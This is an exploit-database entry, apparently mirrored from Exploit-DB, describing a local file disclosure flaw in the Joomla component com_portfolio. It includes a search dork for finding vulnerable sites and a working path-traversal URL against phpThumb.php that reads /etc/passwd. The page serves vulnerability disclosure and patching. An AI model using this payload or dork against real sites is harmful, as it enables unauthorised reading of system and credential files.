header-logo
Suggest Exploit
vendor:
com_portfolio
by:
Mr.tro0oqy
7,5
CVSS
HIGH
Local File Disclosure
20
CWE
Product Name: com_portfolio
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla compnent com_portfolio Local File Disclosure

A vulnerability in the Joomla component com_portfolio allows an attacker to read sensitive files on the server. The vulnerability exists due to insufficient validation of user-supplied input in the 'w' and 'src' parameters of the phpThumb.php script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to read sensitive files on the server, such as the /etc/passwd file.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of the Joomla component com_portfolio.
Source

Exploit-DB raw data:

Joomla compnent com_portfolio Local File Disclosure

author : Mr.tro0oqy from comunity college :(

email : t.4@windowslive.com

greetz:alzomer , Mr.ksoory , R3d-D3vil from palstine .. 

dork :inurl:index.php?option=com_portfolio

exp:

http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR